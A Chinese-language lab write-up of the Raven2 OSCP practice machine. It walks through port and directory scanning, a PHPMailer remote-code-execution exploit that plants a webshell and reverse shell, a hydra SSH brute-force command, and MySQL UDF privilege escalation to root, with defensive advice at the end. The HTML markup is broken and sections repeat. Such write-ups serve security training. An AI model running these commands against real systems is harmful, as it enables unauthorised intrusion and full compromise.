OSCP靶场52——Raven2 渗透测试教学文档<\/h1>

概述<\/h2>
Raven2是OSCP（Offensive Security Certified Professional）认证考试中的一个模拟靶场环境，本教学文档将详细解析对该靶场的完整渗透测试过程，涵盖信息收集、漏洞利用和权限提升等关键环节。<\/p>

攻击链总览<\/h2>

信息收集<\/strong>：通过端口扫描和目录枚举发现服务与潜在入口点<\/li>
边界突破<\/strong>：利用PHPMailer插件漏洞实现远程代码执行<\/li>

权限提升<\/strong>：通过MySQL的UDF（用户定义函数）功能实现从www-data到root的提权<\/li> <\/ol>
关键技术点<\/h2>
1. PHPMailer插件漏洞 (CVE-2016-10033)<\/h3>

漏洞组件<\/strong>：PHPMailer 5.2.16<\/li>
漏洞类型<\/strong>：远程代码执行<\/li>
利用条件<\/strong>：存在邮件发送功能的接触页面(contact.php)<\/li>
利用方式<\/strong>：通过特殊构造的邮件参数实现代码注入<\/li> <\/ul>
2. MySQL UDF提权<\/h3>

前提条件<\/strong>：

MySQL以root权限运行<\/li>
具备MySQL文件写入权限(secure_file_priv配置允许)<\/li>
能够创建自定义函数<\/li> <\/ul> <\/li>
技术原理<\/strong>：通过共享库文件(15.so)创建可执行系统命令的函数<\/li> <\/ul>
详细渗透过程<\/h2>
阶段一：信息收集<\/h3>
端口扫描<\/h4>
# 使用nmap进行全端口扫描<\/span> <\/span><\/span>ports=<\/span>$(<\/span>nmap -p- --min-rate=<\/span>1000<\/span> -T4 172.16.33.190| grep ^[<\/span>0-9]<\/span> | cut -d '\/'<\/span> -f 1<\/span> | tr '\n'<\/span> ','<\/span> | sed s\/,$\/\/)<\/span> <\/span><\/span> <\/span><\/span># 对发现的端口进行详细扫描<\/span> <\/span><\/span>nmap -A -p$ports 172.16.33.190 > n1.txt <\/span><\/span><\/code><\/pre>发现服务<\/strong>：<\/p> 80端口：Web服务（WordPress站点）<\/li> 22端口：SSH服务<\/li> 111端口：RPC服务<\/li> 48407端口：未知服务（需进一步探测）<\/li> <\/ul> Web目录枚举<\/h4> # 使用gobuster进行目录扫描<\/span> <\/span><\/span>gobuster dir -u http:\/\/172.16.33.190\/ -w \/usr\/share\/dirb\/wordlists\/common.txt -t 10<\/span> --timeout 15s --delay 100ms <\/span><\/span> <\/span><\/span># 使用dirsearch进行文件扫描<\/span> <\/span><\/span>dirsearch -u http:\/\/172.16.33.190\/ -f -e php,txt,pdf,html <\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p> WordPress站点路径：\/wordpress\/<\/li> PHPMailer组件：版本5.2.16（存在已知漏洞）<\/li> 联系页面：contact.php（邮件功能入口）<\/li> <\/ul> WordPress扫描<\/h4> # 使用wpscan扫描WordPress漏洞<\/span> <\/span><\/span>wpscan --url http:\/\/172.16.33.190\/wordpress\/ --enumerate vp,vt,u --api-token XXX <\/span><\/span><\/code><\/pre>发现的用户<\/strong>：<\/p> 两个普通用户账户（为后续SSH爆破提供用户名列表）<\/li> <\/ul> 阶段二：边界突破<\/h3> PHPMailer漏洞利用<\/h4> 搜索可用漏洞利用代码<\/strong>：<\/p> searchsploit PHPMailer <\/span><\/span><\/code><\/pre><\/li> 利用关键点<\/strong>：<\/p> 目标URL：http:\/\/172.16.33.190\/contact.php<\/li> 需要指定完整的Web根目录路径：\/var\/www\/backdoor.php<\/li> 成功利用后上传Webshell<\/li> <\/ul> <\/li> 获取初始访问<\/strong>：<\/p> 通过漏洞上传Webshell并获取www-data权限的reverse shell<\/li> <\/ul> <\/li> <\/ol> 阶段三：权限提升<\/h3> 用户枚举<\/h4> 发现两个普通用户账户<\/li> 尝试SSH爆破（未成功）： hydra -L username.txt -P rockyou.txt 172.16.33.190 ssh -t 32<\/span> -e nsr -vV -f <\/span><\/span><\/code><\/pre><\/li> <\/ul> MySQL UDF提权过程<\/h4> 发现提权机会<\/strong>：<\/p> MySQL进程以root权限运行<\/li> 具备文件写入权限<\/li> <\/ul> <\/li> 检查MySQL配置<\/strong>：<\/p> show<\/span> variables like<\/span> '%secure_file_priv%'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 编译恶意共享库<\/strong>：<\/p> gcc -g -c 15.c <\/span><\/span>gcc -g -shared -Wl,-soname,15.so -o 15.so 15.o -lc <\/span><\/span><\/code><\/pre><\/li> MySQL操作步骤<\/strong>：<\/p> use mysql; <\/span><\/span>create<\/span> table<\/span> foo(line blob); <\/span><\/span>insert<\/span> into<\/span> foo values<\/span>(load_file('\/tmp\/15.so'<\/span>)); <\/span><\/span>select<\/span> *<\/span> from<\/span> foo into<\/span> dumpfile '\/usr\/lib\/mysql\/plugin\/15.so'<\/span>; <\/span><\/span>create<\/span> function<\/span> do_sysf returns<\/span> integer soname '15.so'<\/span>; <\/span><\/span>select<\/span> *<\/span> from<\/span> mysql.func; -- 验证函数创建成功 <\/span><\/span><\/span><\/code><\/pre><\/li> 执行提权<\/strong>：<\/p> 通过创建的UDF函数执行系统命令<\/li> 反弹root权限的shell<\/li> <\/ul> <\/li> <\/ol> 关键知识点总结<\/h2> 信息收集重要性<\/strong>：全面的端口扫描和目录枚举是发现攻击面的基础<\/li> 漏洞研究能力<\/strong>：需要能够快速识别和验证已知组件的安全漏洞<\/li> 路径理解<\/strong>：Web漏洞利用时需要准确理解目标服务器的文件系统结构<\/li> 数据库提权<\/strong>：MySQL以root权限运行且具备文件写入权限时，UDF提权是有效方法<\/li> 权限链构建<\/strong>：从Web应用漏洞到系统级权限的完整攻击链构建<\/li> <\/ol> 防御建议<\/h2> 及时更新组件<\/strong>：保持所有Web组件（如PHPMailer）最新版本<\/li> 最小权限原则<\/strong>：MySQL等服务不应以root权限运行<\/li> 安全配置<\/strong>：合理设置MySQL的secure_file_priv等安全参数<\/li> 输入验证<\/strong>：对所有用户输入进行严格过滤和验证<\/li> 网络隔离<\/strong>：限制不必要的网络服务和端口暴露<\/li> <\/ol> 参考资源<\/h2> PHPMailer漏洞详情：https:\/\/legalhackers.com\/advisories\/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html<\/li> MySQL UDF提权技术详解<\/li> OSCP官方认证指南<\/li> <\/ol> 本教学文档仅用于教育目的和安全研究，请勿用于非法用途。<\/em><\/p>

OSCP靶场52——Raven2 渗透测试教学文档<\/h1>

概述<\/h2> Raven2是OSCP（Offensive Security Certified Professional）认证考试中的一个模拟靶场环境，本教学文档将详细解析对该靶场的完整渗透测试过程，涵盖信息收集、漏洞利用和权限提升等关键环节。<\/p>

关键技术点<\/h2>

详细渗透过程<\/h2>

阶段一：信息收集<\/h3>

阶段二：边界突破<\/h3>

阶段三：权限提升<\/h3>

概述<\/h2>
Raven2是OSCP（Offensive Security Certified Professional）认证考试中的一个模拟靶场环境，本教学文档将详细解析对该靶场的完整渗透测试过程，涵盖信息收集、漏洞利用和权限提升等关键环节。<\/p>